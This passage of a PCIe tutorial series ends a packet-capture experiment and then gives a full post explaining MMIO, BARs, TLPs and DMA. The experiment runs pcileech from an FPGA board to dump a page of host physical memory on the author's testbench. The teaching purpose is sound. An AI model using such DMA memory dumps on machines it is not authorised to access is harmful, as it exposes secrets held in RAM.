    90000000-b3ffffff : PCI Bus 0000:02
      90000000-b3ffffff : PCI Bus 0000:04
        90000000-b3ffffff : PCI Bus 0000:05
          90000000-901fffff : PCI Bus 0000:07
  c0000000-d01fffff : PCI Bus 0000:2b
    c0000000-cfffffff : 0000:2b:00.0
    d0000000-d01fffff : 0000:2b:00.0
  d8000000-ee9fffff : PCI Bus 0000:01
    d8000000-ee9fffff : PCI Bus 0000:02
      d8000000-ee1fffff : PCI Bus 0000:04
        d8000000-ee1fffff : PCI Bus 0000:05
          d8000000-d80fffff : PCI Bus 0000:08
          d8000000-d800ffff : 0000:08:00.0
          d8000000-d800ffff : xhci-hcd
          d8100000-d82fffff : PCI Bus 0000:07
          ee100000-ee1fffff : PCI Bus 0000:06
          ee100000-ee13ffff : 0000:06:00.0
          ee100000-ee13ffff : thunderbolt
          ee140000-ee140fff : 0000:06:00.0
      ee300000-ee4fffff : PCI Bus 0000:27
        ee300000-ee3fffff : 0000:27:00.3
          ee300000-ee3fffff : xhci-hcd
        ee400000-ee4fffff : 0000:27:00.1
          ee400000-ee4fffff : xhci-hcd
      ee500000-ee5fffff : PCI Bus 0000:29
        ee500000-ee5007ff : 0000:29:00.0
          ee500000-ee5007ff : ahci
      ee600000-ee6fffff : PCI Bus 0000:28
        ee600000-ee6007ff : 0000:28:00.0
          ee600000-ee6007ff : ahci
      ee700000-ee7fffff : PCI Bus 0000:26
        ee700000-ee71ffff : 0000:26:00.0
          ee700000-ee71ffff : igb
        ee720000-ee723fff : 0000:26:00.0
          ee720000-ee723fff : igb
      ee800000-ee8fffff : PCI Bus 0000:25
        ee800000-ee803fff : 0000:25:00.0
          ee800000-ee803fff : iwlwifi
      ee900000-ee9fffff : PCI Bus 0000:03
        ee900000-ee903fff : 0000:03:00.0
          ee900000-ee903fff : nvme
  eeb00000-eeefffff : PCI Bus 0000:2b
    eeb00000-eebfffff : 0000:2b:00.4
      eeb00000-eebfffff : xhci-hcd
    eec00000-eecfffff : 0000:2b:00.3
      eec00000-eecfffff : xhci-hcd
    eed00000-eedfffff : 0000:2b:00.2
      eed00000-eedfffff : ccp
    eee00000-eee7ffff : 0000:2b:00.0
    eee80000-eee87fff : 0000:2b:00.6
      eee80000-eee87fff : ICH HD audio
    eee88000-eee8bfff : 0000:2b:00.1
      eee88000-eee8bfff : ICH HD audio
    eee8c000-eee8dfff : 0000:2b:00.2
      eee8c000-eee8dfff : ccp
  eef00000-eeffffff : PCI Bus 0000:2c
    eef00000-eef007ff : 0000:2c:00.1
      eef00000-eef007ff : ahci
    eef01000-eef017ff : 0000:2c:00.0
      eef01000-eef017ff : ahci
  ef000000-ef0fffff : PCI Bus 0000:2a
    ef000000-ef000fff : 0000:2a:00.0
f0000000-f7ffffff : PCI MMCONFIG 0000 [bus 00-7f]
    f0000000-f7ffffff : pnp 00:00
  fd210510-fd21053f : MSFT0101:00
  feb80000-febfffff : pnp 00:01
  fec00000-fec003ff : IOAPIC 0
  fec01000-fec013ff : IOAPIC 1
  fec10000-fec10fff : pnp 00:05
  fed00000-fed003ff : HPET 0
    fed00000-fed003ff : PNP0103:00
  fed81200-fed812ff : AMDI0030:00
  fed81500-fed818ff : AMDI0030:00
fedc0000-fedc0fff : pnp 00:05
fee00000-fee00fff : Local APIC
  fee00000-fee00fff : pnp 00:05
  ff000000-ffffffff : pnp 00:05
100000000-24e2fffff : System RAM
  250000000-26fffffff : pnp 00:02
3fffe0000000-3fffffffffff : 0000:2b:00.0

Reserved regions removed for brevity.

In this case, for this experiment, I am going to read 0x1000 bytes (one 4096 byte page) of memory from the 32-bit address 0x10000 which begins the first range of System RAM assigned to the physical address layout:

00001000-0009ffff : System RAM

Since this is actual RAM, our DMA will be successful. If this was not memory, our request would likely receive a Completion Error with Unsupported Request.

The pcileech command to execute will be:

sudo pcileech -device rawudp://ip=10.0.0.64 dump -min 0x1000 -max 0x2000

Where:

The FPGA device is assigned the IP address 10.0.0.64 by my LAN
dump is the command to execute
-min 0x1000 specifies to start dumping memory from this address
-max 0x2000 specifies to stop dumping memory at this address. This results in 0x1000 bytes being read from the device.

Analyzer Output

From this output, you can see an interesting property of DMA: the sheer number of packets involved. The first packet here is a MemRd_32 packet headed upstream. If the address being targeted was a 64-bit address, it would use the MemRd_64 TLP. Let’s take a look at that first:

Here we can see a few interesting things:

The Requester field contains the device’s BDF. This is because the device initiated the request, not the Root Complex.
The Address is 0x1000. This means we are requesting to read from address 0x1000 as expected.
The Length is 0x000, which is the number of 4-byte DWORDs to transfer. This seems a bit weird, because we are reading 4096 bytes of data. This is actually because 0x000 is a special number that means Maximum Length. In the above bit layout, we see the Length field in the packet is 9 bits. The maximum 9 bit value that can be expressed in binary is 0x3FF. 0x3FF * 4 = 0xFFC which is 4 bytes too small to express the number 4096. Since transferring 0 bytes of data doesn’t make sense, the number is used to indicate the maximum value, or 4096 in this case!
The Tag is 0x80. We will expect all Completions to also have the same Tag to match the response to the request.

And finally, let’s look at the first Completion with Data (CplD) returned by the host:

We can see right off the bat that this looks a whole lot like a Completion with Data for the config space read in the previous section. But in this case, it’s much larger in size, containing a total of 128 bytes of payload returned from System RAM to our device.

Some more interesting things to point out here:

Length: Length is 0x20 DWORDs, or 0x20*4=128 bytes of payload. This means that the resulting 4096 byte transfer has been split up into many CplD TLPs each containing 128 bytes of the total payload.
Byte Count: This value shows the remaining number of DWORDs left to be sent back for the request. In this case, it is 0x000 again, which means that this is the first of 4096 bytes pending.
Tag: The Tag of 0x80 matches the value of our request.
Requester ID: This Completion found its way back to our device due to the 2A:00.0 address being marked in the requester.
Completer ID: An interesting change here compared to config space, but the Completer here is not the 00:00.0 Root Complex device. Instead, it is a device 00:01.3. What device is that? If we look back up at the lspci output, this is a Root Port bridge device. It appears that this platform marks the Completer of the request as the Root Port the device is connected to, not the Root Complex itself.

And just for consistency, here is the second Completion with Data (CplD) returned by the host:

The major change here for the second chunk of 128 bytes of payload is that the Byte Count field has decremented by 0x20, which was the size of the previous completion. This means that this chunk of data will be read into the device at offset 0x20*4 = 0x80. This shouldn’t be too surprising, we will continue to decrement this Byte Count field until it eventually reaches 0x020, which will mark the final completion of the transfer. The DMA Engine on the device will recognize that the transfer is complete and mark the original 4096 byte request as complete internally.

gbps@testbench:~/pcileech$ sudo pcileech -device rawudp://ip=10.0.0.64 dump -min 0x1000 -max 0x2000

 Current Action: Dumping Memory
 Access Mode:    Normal
 Progress:       0 / 0 (100%)
 Speed:          4 kB/s
 Address:        0x0000000000001000
 Pages read:     1 / 1 (100%)
 Pages failed:   0 (0%)
Memory Dump: Successful.

Maximum Payload Size Configuration

Now only one question remains, why are there so many Completion TLPs for a single page read?

The answer lies in a specific configuration property of the device and the platform: the Maximum Payload Size.

If we look back at the configuration space of the device:

The Device Control register has been programmed with a MaxPayload of 128 bytes. This means that the device is not allowed to send or receive any TLP with a payload larger than 128 bytes. This means that our 4096 byte request will always be fragmented into 4096/128 = 32 completions per page.

If you notice above, there is a field DevCap: MaxPayload 256 bytes that dictates that the Device Capabilities register is advertising this device’s hardware is able to handle up to 256 bytes. So if this device supports up to 256 byte payloads, that means the device could potentially cut the TLP header overhead in half to only 16 completions per page.

It is not clear what from the platform or OS level at this exact moment has reduced the MaxPayload to 128 bytes. Typically it is the bridge device above the device in question that limits the MaxPayload size, however in this case the max size supported by the Root Port this device is connected to is 512 bytes. With some further investigation, maybe I’ll be able to discover that answer.

And there you have it, a more in-depth look into how a device performs DMA!

Conclusion

This simple experiment hopefully gives you a nicer look into the “black box” of the PCIe link. While it’s nice to see diagrams, I think it’s much sweeter to look into actual packets on the wire to confirm that your understanding is what actually happens in practice.

We saw that config space requests are simple 4-byte data accesses that utilize the CfgRd and CfgWr TLP types. This is separate from DMA or MMIO, which uses the MemRd/MemWr that are used in DMA and MMIO. We also saw how the Completions can be fragmented in order to return parts of the overall transfer for larger DMA transfers such as the 4096 page size.

I hope to provide more complex or potentially more “interactive” experiments later. For now, I leave you with this as a more simplistic companion to the Part 2 of my series.

Hope you enjoyed!

- Gbps

Reversing Engineering for the Soul
PCIe Part 2 - All About Memory: MMIO, DMA, TLPs, and more!
26 March 2024 at 00:00

PCIe Part 2 - All About Memory: MMIO, DMA, TLPs, and more!

Reversing Engineering for the Soul

26 March 2024 at 00:00

Recap from Part 1

In Part 1 of this post series, we discussed ECAM and how configuration space accesses looked in both software and on the hardware packet network. In that discussion, the concepts of TLPs (Transaction Layer Packets) were introduced, which is the universal packet structure by which all PCIe data is moved across the hierarchy. We also discussed how these packets move similar to Ethernet networks in that an address (the BDF in this case) was used by routing devices to send Configuration Space packets across the network.

Configuration space reads and writes are just one of the few ways that I/O can be performed directly with a device. Given its “configuration” name, it is clear that its intention is not for performing large amounts of data transfer. The major downfall is its speed, as a configuration space packet can only contain at most 64-bits of data being read or written in either direction (often only 32-bits). With that tiny amount of usable data, the overhead of the packet and other link headers is significant and therefore bandwidth is wasted.

As discussed in Part 1, understanding memory and addresses will continue to be the key to understanding PCIe. In this post, we will look more in-depth into the much faster forms of device I/O transactions and begin to form an understanding of how software device drivers actually interface with PCIe devices to do useful work. I hope you enjoy!

NOTE: You do not need to be an expert in computer architecture or TCP/IP networking to get something from this post. However, knowing the basics of TCP/IP and virtual memory is necessary to grasp some of the core concepts of this post. This post also builds off of information from Part 1. If you need to review these, do so now!

Introduction to Data Transfer Methods in PCIe

Configuration space was a simple and effective way of communicating with a device by its BDF during enumeration time. It is a simple mode of transfer for a reason - it must be the basis by which all other data transfer methods are configured and made usable. Once the device is enumerated, configuration space has set up all of the information the device needs to perform actual work together with the host machine. Configuration space is still used to allow the host machine to monitor and respond to changes in the state of the device and its link, but it will not be used to perform actual high speed transfer or functionality of the device.

What we now need are data transfer methods that let us really begin to take advantage of the high-speed transfer throughput that PCIe was designed for. Throughput is a measurement of the # of bytes transferred over a given period of time. This means to maximize throughput, we must minimize the overhead of each packet to transfer the maximum number of bytes per packet. If we only send a few DWORDs (4-bytes each) per packet, like in the case of configuration space, the exceptional high-speed transfer capabilities of the PCIe link are lost.

Without further ado, let’s introduce the two major forms of high-speed I/O in PCIe:

Memory Mapped Input/Output (abbrev. MMIO) - In the same way the host CPU reads and writes memory to ECAM to perform config space access, MMIO can be used to map an address space of a device to perform memory transfers. The host machine configures “memory windows” in its physical address space that gives the CPU a window of memory addresses which magically translate into reads and writes directly to the device. The memory window is decoded inside the Root Complex to transform the reads and writes from the CPU into data TLPs that go to and from the device. Hardware optimizations allow this method to achieve a throughput that is quite a bit faster than config space accesses. However, its speed still pales in comparison to the bulk transfer speed of DMA.
Direct Memory Access (abbrev. DMA) - DMA is by far the most common form of data transfer due to its raw transfer speed and low latency. Whenever a driver needs to do a transfer of any significant size between the host and the device in either direction, it will assuredly be DMA. But unlike MMIO, DMA is initiated by the device itself, not the host CPU. The host CPU will tell the device over MMIO where the DMA should go and the device itself is responsible for starting and finishing the DMA transfer. This allows devices to perform DMA transactions without the CPU’s involvement, which saves a huge number of CPU cycles than if the device had to wait for the host CPU to tell it what to do each transfer. Due to its ubiquity and importance, it is incredibly valuable to understand DMA from both the hardware implementation and the software interface.

High level overview of MMIO method

High level overview of performing DMA from device to RAM. The device interrupts the CPU when the transfer to RAM is complete.

Introduction to MMIO

What is a BAR?

Because configuration space memory is limited to 4096 bytes, there’s not much useful space left afterwards to use for device-specific functionality. What if a device wanted to map a whole gigabyte of MMIO space for accessing its internal RAM? There’s no way that can fit that into 4096 bytes of configuration space. So instead, it will need to request what is known as a BAR (Base Address Register) . This is a register exposed through configuration space that allows the host machine to configure a region of its memory to map directly to the device. Software on the host machine then accesses BARs through memory read/write instructions directed to the BAR’s physical addresses, just as we’ve seen with the MMIO in ECAM in Part 1. Just as with ECAM, the act of reading or writing to this mapping of device memory will translate directly into a packet sent over the hierarchy to the device. When the device needs to respond, it will send a new packet back up through the hierarchy to the host machine.

Device drivers running on the host machine access BAR mappings, which translate into packets sent through PCIe to the device.

When a CPU instruction reads the memory of a device’s MMIO region, a Memory Read Request Transaction Layer Packet (MemRd TLP) is generated that is transferred from the Root Complex of the host machine down to the device. This type of TLP informs the receiver that the sender wishes to read a certain number of bytes from the receiver. The expectation of this packet is that the device will respond with the contents at the requested address as soon as possible.

All data transfer packets sent and received in PCIe will be in the form of these Transaction Layer Packets. Recall from Part 1 that these packets are the central abstraction by which all communication between devices takes place in PCIe. These packets are reliable in the case of data transfer errors (similar to TCP in networking) and can be retried/resent if necessary. This ensures that data transfers are protected from the harsh nature of electrical interference that takes place in the extremely high speeds that PCIe can achieve. We will look closer at the structure of a TLP soon, but for now just think of these as regular network packets you would see in TCP.

When the device responds, the CPU updates the contents of the register with the result from the device.

When the device receives the requestor packet, the device responds to the memory request with a Memory Read Response TLP. This TLP contains the result of the read from the device’s memory space given the address and size in the original requestor packet. The device marks the specific request packet and sender it is responding to into the response packet, and the switching hierarchy knows how to get the response packet back to the requestor. The requestor will then use the data inside the response packet to update the CPU’s register of the instruction that produced the original request.

In the meantime while a TLP is in transit, the CPU must wait until the memory request is complete and it cannot be interrupted or perform much useful work. As you might see, if lots of these requests need to be performed, the CPU will need to spend a lot of time just waiting for the device to respond to each request. While there are optimizations at the hardware level that make this process more streamlined, it still is not optimal to use CPU cycles to wait on data transfer to be complete. Hopefully you see that we need a second type of transfer, DMA, to address these shortcomings of BAR access.

Another important point here is that device memory does not strictly need to be for the device’s - RAM. While it is common to see devices with onboard RAM having a mapping of its internal RAM exposed through a BAR, this is not a requirement. For example, it’s possible that accessing the device’s BAR might access internal registers of the device or cause the device to take certain actions. For example, writing to a BAR is the primary way by which devices begin performing DMA. A core takeaway should be that device BARs are very flexible and can be used for both controlling the device or for performing data transfer to or from the device.

How BARs are Enumerated

Devices request memory regions from software using its configuration space. It is up to the host machine at enumeration time to determine where in physical memory that region is going to be placed. Each device has six 32-bit values in its configuration space (known as “registers”, hence the name Base Address Register) that the software will read and write to when the device is enumerated. These registers describe the length and alignment requirements of each of the MMIO regions the device wishes to allocate, one per possible BAR up to a total of six different regions. If the device wants the ability to map its BAR to above the 4GB space (a 64-bit BAR), it can combine two of the 32-bit registers together to form one 64-bit BAR, leaving a maximum of only three 64-bit BARs. This retains the layout of config space for legacy purposes.

A Type 0 configuration space structure, showing the 6 BARs.

TERMINOLOGY NOTE: Despite the acronym BAR meaning Base Address Register, you will see the above text refers to the memory window of MMIO as a BAR as well. This unfortunately means that the name of the register in configuration space is also the same name as the MMIO region given to the device (both are called BARs). You might need to read into the context of what is being talked about to determine if they mean the window of memory, or the actual register in config space itself.

BARs are another example of a register in config space that is not constant. In Part 1, we looked at some constant registers such as VendorID and DeviceID. But BARs are not constant registers, they are meant to be written and read by the software. In fact, the values written to the registers by the software are special in that writing certain kinds of values to the register will result in different functionality when read back. If you haven’t burned into your brain the fact that device memory is not always RAM and one can read values back different than what was written, now’s the time to do that.

Device memory can be RAM, but it is not always RAM and does not need to act like RAM!

What is DMA? Introduction and Theory

We have seen two forms of I/O so far, the config space access and the MMIO access through a BAR. The last and final form of access we will talk about is Direct Memory Access (DMA). DMA is by far the fastest method of bulk transfer for PCIe because it has the least transfer overhead. That is, the least amount of resources are required to transfer the maximum number of bytes across the link. This makes DMA absolutely vital for truly taking advantage of the high speed link that PCIe provides.

But, with great power comes great confusion. To software developers, DMA is a very foreign concept because we don’t have anything like it to compare to in software. For MMIO, we can conceptualize the memory accesses as instructions reading and writing from device memory. But DMA is very different from this. This is because DMA is asynchronous, it does not utilize the CPU in order to perform the transfer. Instead, as the name implies, the memory read and written comes and goes directly from system RAM. The only parties involved once DMA begins is the memory controller of the system’s main memory and the device itself. Therefore, the CPU does not spend cycles waiting for individual memory access. It instead just initiates the transfer and lets the platform complete the DMA on its own in the background. The platform will then inform the CPU when the transfer is complete, typically through an interrupt.

Let’s think for a second why this is so important that the DMA is performed asynchronously. Consider the case where the CPU is decrypting a huge number of files from a NVMe SSD on the machine. Once the NVMe driver on the host initiates DMA, the device is constantly streaming file data as fast as possible from the SSD’s internal storage to locations in system RAM that the CPU can access. Then, the CPU can use 100% of its processing power to perform the decryption math operations necessary to decrypt the blocks of the files as it reads data from system memory. The CPU spends no time waiting for individual memory reads to the device, it instead just hooks up the firehose of data and allows the device to transfer as fast as it possibly can, and the CPU processes it as fast as it can. Any extra data is buffered in the meantime within the system RAM until the CPU can get to it. In this way, no part of any process is waiting on something else to take place. All of it is happening simultaneously and at the fastest speed possible.

Because of its complexity and number of parts involved, I will attempt to explain DMA in the most straightforward way that I can with lots of diagrams showing the process. To make things even more confusing, every device has a different DMA interface. There is no universal software interface for performing DMA, and only the designers of the device know how that device can be told to perform DMA. Some device classes thankfully use a universally agreed upon interface such as the NVMe interface used by most SSDs or the XHCI interface for USB 3.0. Without a standard interface, only the hardware designer knows how the device performs DMA, and therefore the company or person producing the device will need to be the one writing the device driver rather than relying on the universal driver bundled with the OS to communicate with the device.

A “Simple” DMA Transaction - Step By Step

The first step of our DMA journey will be looking at the initial setup of the transfer. This involves a few steps that prepare the system memory, kernel, and device for the upcoming DMA transfer. In this case, we will be setting up DMA in order to read in the contents of memory in our DMA Buffer which is present in system RAM and place it into the device’s on-board RAM at Target Memory. We have already chosen at this point to read this memory from the DMA Buffer into address 0x8000 on the device. The goal is to transfer this memory as quickly as possible from system memory to the device so it can begin processing it. Assume in this case that the amount of memory is many megabytes and MMIO would be too slow, but we will only show 32 bytes of memory for simplicity. This transfer will be the simplest kind of DMA transfer: Copy a known size and address of a block of memory from system RAM into device RAM.

Step 1 - Allocating DMA Memory from the OS

The first step of this process is Allocate DMA Memory from OS. This means that the device driver must make an OS API call to ask the OS to allocate a region of memory for the device to write data to. This is important because the OS might need to perform special memory management operations to make the data available to the device, such as removing protections or reorganizing existing allocations to facilitate the request.

DMA memory classically must be contiguous physical memory, which means that the device starts at the beginning of some address and length and read/writes data linearly from the start to end of the buffer. Therefore, the OS must be responsible for organizing its physical memory to create contiguous ranges that are large enough for the DMA buffers being requested by the driver. Sometimes, this can be very difficult for the memory manager to do for a system that has been running for a very long time or has limited physical memory. Therefore, enhancements in this space have allowed more modern devices to transfer to non-contiguous regions of memory using features such as Scatter-Gather and IOMMU Remapping. Later on, we will look at some of those features. But for now, we will focus only on the simpler contiguous memory case.

Once the requested allocation succeeds, the memory address is returned by the API and points to the buffer in system RAM. This will be the address that the device will be able to access memory through DMA. The addresses returned by an API intended for DMA will be given a special name; device logical address or just logical address. For our example, a logical address is identical to a physical address. The device sees the exact same view of physical memory that our OS sees, and there are no additional translations done. However, this might not always be the case in more advanced forms of transfer. Therefore it’s best to be aware that a device address given to you might not always be the same as its actual physical address in RAM.

Once the buffer is allocated, since the intention is to move data from this buffer to the device, the device driver will populate the buffer in advance with the information it needs to write to the device. In this example, data made of a repeating 01 02 03 04 pattern is being transferred to the device’s RAM.

Step 2 - Programming DMA addresses to the device and beginning transfer

The next step of the transfer is to prepare the device with the information it needs to perform the transaction. This is usually where the knowledge of the device’s specific DMA interface is most important. Each device is programmed in its own way, and the only way to know how the driver should program the device is to either refer to its general standard such as the NVMe Specification or to simply work with the hardware designer.

In this example, I am going to make up a simplified DMA interface for a device with only the most barebones features necessary to perform a transfer. In the figures below, we can see that this device is programmed through values it writes into a BAR0 MMIO region. That means that to program DMA for this device, the driver must write memory into the MMIO region specified by BAR0. The locations of each register inside this BAR0 region are known in advance by the driver writer and is integrated into the device driver’s code.

I have created four device registers in BAR0 for this example:

Destination Address - The address in the device’s internal RAM to write the data it reads from system RAM. This is where we will program our already-decided destination address of 0x8000.
Source Address - The logical address of system RAM that the device will read data from. This will be programmed the logical address of our DMA Buffer which we want the device to read.
Transfer Size - The size in bytes that we want to transfer.
Initiate Transfer - As soon as a 1 is written to this register, the device will begin DMAing between the addresses given above. This is a way that the driver can tell that the device is done populating the buffer and is ready to start the transfer. This is commonly known as a doorbell register.

In the above diagram, the driver will need to write the necessary values into the registers using the mapped memory of BAR0 for the device (how it mapped this memory is dependent on the OS). The values in this diagram are as follows:

Target Memory - The memory we want to copy from the device will be at 0x00008000, which maps to a region of memory in the device’s on-board RAM. This will be our destination address.
DMA Buffer - The OS allocated the chunk of memory at 0x001FF000, so this will be our source address.

With this information, the driver can now program the values into the device as shown here:

Now, at this point the driver has configured all the registers necessary to perform the transfer. The last step is to write a value to the Initiate Transfer register which acts as the doorbell register that begins the transfer. As soon as this value is written, the device will drive the DMA transfer and execute it independently of the driver or the CPU’s involvement. The driver has now completed its job of starting the transfer and now the CPU is free to do other work while it waits on the device to notify the system of the DMA completion.

Step 3 - Device performs DMA transaction

Now that the doorbell register has been written to by the driver, the device now takes over to handle the actual transfer. On the device itself, there exists a module called the DMA Engine responsible for handling and maintaining all aspects of the transaction. When the device was programmed, the register writes to BAR0 were programming the DMA engine with the information it needs to begin sending off the necessary TLPs on the PCIe link to perform memory transactions.

As discussed in a previous section, all memory operations on the PCIe link are done through Memory Write/Read TLPs. Here we will dive into what TLPs are sent and received by the DMA engine of the device while the transaction is taking place. Remember that it is easier to think of TLPs as network packets that are sending and receiving data on a single, reliable connection.

Interlude: Quick look into TLPs

Before we look at the TLPs on the link, let’s take a closer look at a high level overview of packet structure itself.

Here are two TLPs shown for a memory read request and response. As discussed, TLPs for memory operations utilize a request and response system. The device performing the read will generate a Read Request TLP for a specific address and length (in 4-byte DWORDs), then sit back and wait for the completion packets to arrive on the link containing the response data.

We can see there is metadata related to the device producing the request, the Requester, as well as a unique Tag value. This Tag value is used to match a request with its completion. When the device produces the request, it tags the TLP with a unique value to track a pending request. The value is chosen by the sender of the request, and it is up to the sender to keep track of the Tags it assigns.

As completions arrive on the link, the Tag value of the completion allows the device to properly move the incoming data to the desired location for that specific transfer. This system allows there to be multiple unique outstanding transfers from a single device that are receiving packets interleaved with each other but still remain organized as independent transfers.

Also inside the packet is the information necessary to enable the PCIe switching hierarchy to determine where the request and completions need to go. For example, the Memory Address is used to determine which device is being requested for access. Each device in the hierarchy has been programmed during enumeration time to have unique ranges of addresses that each device owns. The switching hierarchy looks at the memory address in the packet to determine where that packet needs to go in order to access that address.

Once the device receives and processes the request, the response data is sent back in the form of a Completion TLP. The completion, or “response” packet, can and often will be fragmented into many smaller TLPs that send a part of the overall response. This is because there is a Maximum Payload Size (MPS) that was determined could be handled by the device and bus during enumeration time. The MPS is configurable based on platform and device capability and is a power of 2 size starting from 128 and going up to a potential 4096. Typically this value is around 256 bytes, meaning large read request will need to be split into many smaller TLPs. Each of these packets have a field that dictates what offset of the original request the completion is responding to and in the payload is the chunk of data being returned.

There is a common misconception that memory TLPs use BDF to address where packets need to go. The request uses only a memory address to direct a packet to its destination, and its the responsibility of the bridges in-between the device and destination to get that packet to its proper location. However, the completion packets do use the BDF of the Requester to return the data back to the device that requested it.

Below is a diagram of a memory read and response showcasing that requests use an address to make requests and completions use the BDF in the Requester field of the request to send a response:

Now back to the actual transaction…

Let’s look at what all is sent and received by the DMA Engine in order to perform our request. Since we requested 32 bytes of data, there will only be one singular Memory Read Request and a singular Memory Read Completion packet with the response. For a small exercise for your understanding, stop reading forward and think for a moment which device is going to send and receive which TLP in this transaction. Scroll up above if you need to look at the diagrams of Step 2 again.

Now, let’s dig into the actual packets of the transfer. While I will continue to diagram this mock example out, I thought that for this exercise it might be fun and interesting to the reader to actually see what some of these TLPs look like when a real transaction is performed.

In the experiment, I set up the same general parameters as seen above with a real device and initiate DMA. The device will send real TLPs to read memory from system RAM and into the device. Therefore, you will be able to see a rare look into an example of the actual TLPs sent when performing this kind of DMA which are otherwise impossible to see in transit without one of these analyzers.

To view this experiment, follow this link to the companion post: Experiment - Packet Dumping PCIe DMA TLPs with a Protocol Analyzer and Pcileech

Here is a block diagram of the memory read request being generated by the device and how the request traverses through the hierarchy.

ERRATA: 0x32 should be 32

The steps outlined in this diagram are as follows:

DMA Engine Creates TLP - The DMA engine recognizes that it must read 32 bytes from 0x001FF000. It generates a TLP that contains this request and sends it out via its local PCIe link.
TLP Traverses Hierarchy - The switching hierarchy of PCIe moves this request through bridge devices until it arrives at its destination, which is the Root Complex. Recall that the RC is responsible for handling all incoming packets destined for accessing system RAM.
DRAM Controller is Notified - The Root Complex internally communicates with the DRAM controller which is responsible for actually accessing the memory of the system DRAM.
Memory is Read from DRAM - The given length of 32 bytes is requested from DRAM at address 0x001FF000 and returned to the Root Complex with the values 01 02 03 04…

Try your best not to be overwhelmed by this information, because I do understand there’s a lot going on just for the single memory request TLP. All of this at a high level is boiling down to just reading 32 bytes of memory from address 0x001FF000 in RAM. How the platform actually does that system DRAM read by communicating with the DRAM controller is shown just for your interest. The device itself is unaware of how the Root Complex is actually reading this memory, it just initiates the transfer with the TLP.

NOTE: Not shown here is the even more complicated process of RAM caching. On x86-64, all memory accesses from devices are cache coherent, which means that the platform automatically synchronizes the CPU caches with the values being accessed by the device. On other platforms, such as ARM platforms, this is an even more involved process due to its cache architecture. For now, we will just assume that the cache coherency is being handled automatically for us and we don’t have any special worries regarding it.

When the Root Complex received this TLP, it marked internally what the Requester and Tag were for the read. While it waits for DRAM to respond to the value, the knowledge of this request is pended in the Root Complex. To conceptualize this, think of this as an “open connection” in a network socket. The Root Complex knows what it needs to respond to, and therefore will wait until the response data is available before sending data back “over the socket”.

Finally, the Completion is sent back from the Root Complex to the device. Note the Destination is the same as the Requester:

Here are the steps outlined with the response packet as seen above:

Memory is read from DRAM - 32 bytes are read from the address of the DMA Buffer at 0x001FF000 in system DRAM by the DRAM controller.
DRAM Controller Responds to Root Complex - The DRAM controller internally responds with the memory requested from DRAM to the Root Complex
Root Complex Generates Completion - The Root Complex tracks the transfer and creates a Completion TLP for the values read from DRAM. In this TLP, the metadata values are set based on the knowledge that the RC has of the pending transfer, such as the number of bytes being sent, the Tag for the transfer, and the destination BDF that was copied from the Requester field in the original request.
DMA Engine receives TLP - The DMA engine receives the TLP over the PCIe link and sees that the Tag matches the same tag of the original request. It also internally tracks this value and knows that the memory in the payload should be written to Target Memory, which is at 0x8000 in the device’s internal RAM.
Target Memory is Written - The values in the device’s memory are updated with the values that were copied out of the Payload of the packet.
System is Interrupted - While this is optional, most DMA engines will be configured to interrupt the host CPU whenever the DMA is complete. This gives the device driver a notification when the DMA has been successfully completed by the device.

Again, this is a lot of steps involved with handling just this single completion packet. However, again you can think of this whole thing as simply a “response of 32 bytes is received from the device’s request.” The rest of these steps are just to show you what a full end-to-end of this response processing would look like.

From here, the device driver is notified that the DMA is complete and the device driver’s code is responsible for cleaning up the DMA buffers or storing them away for use next time.

After all of this work, we have finally completed a single DMA transaction! And to think that this was the “simplest” form of a transfer I could provide. With the addition of IOMMU Remapping and Scatter-Gather Capability, these transactions can get even more complex. But for now, you should have a solid understanding of what DMA is all about and how it actually functions with a real device.

Outro - A Small Note on Complexity

If you finished reading this post and felt that you didn’t fully grasp all of the concepts thrown at you or feel overwhelmed by the complexity, you should not worry. The reason these posts are so complex is that it not only spans a wide range of topics, but it also spans a wide range of professions as well. Typically each part of this overall system has distinct teams in the industry who focus only on their “cog” in this complex machine. Often hardware developers focus on the device, driver developers focus on the driver code, and OS developers focus on the resource management. There’s rarely much overlap between these teams, except when handing off at their boundary so another team can link up to it.

These posts are a bit unique in that they try to document the system as a whole for conceptual understanding, not implementation. This means that where team boundaries are usually drawn, these posts simply do not care. I encourage readers who find this topic interesting to continue to dig into it on their own time. Maybe you can learn a thing about FPGAs and start making your own devices, or maybe you can acquire a device and start trying to reverse engineer how it works and communicate with it over your own custom software.

An insatiable appetite for opening black boxes is what the “hacker” mindset is all about!

Conclusion

I hope you enjoyed this deep dive into memory transfer on PCIe! While I have covered a ton of information in this post, the rabbit hole always goes deeper. Thankfully, by learning about config space access, MMIO (BARs), and DMA, you have now covered every form of data communication available in PCIe! For every device connected to the PCIe bus, the communication between the host system and device will take place with one of these three methods. All of the setup and configuration of a device’s link, resources, and driver software is to eventually facilitate these three forms of communication.

A huge reason this post took so long to get out there was due to just the sheer amount of information that I would have to present to a reader in order to make sense of all of this. It’s hard to decide what is worth writing about and what is so much depth that the understanding gets muddied. That decision paralysis has made the blog writing process take much longer than I intended. That, combined with a full time job, makes it difficult to find the time to get these posts written.

In the upcoming posts, I am looking forward to discussing some or all of the following topics:

PCIe switching/bridging and enumeration of the hierarchy
More advanced DMA topics, such as DMA Remapping
Power management; how devices “sleep” and “wake”
Interrupts and their allocation and handling by the platform/OS
Simple driver development examples for a device

As always, if you have any questions or wish to comment or discuss an aspect of this series, you can best find me by “@gbps” in the #hardware channel on my discord, the Reverse Engineering discord: https://discord.com/invite/rtfm

Please look forward to future posts!

-Gbps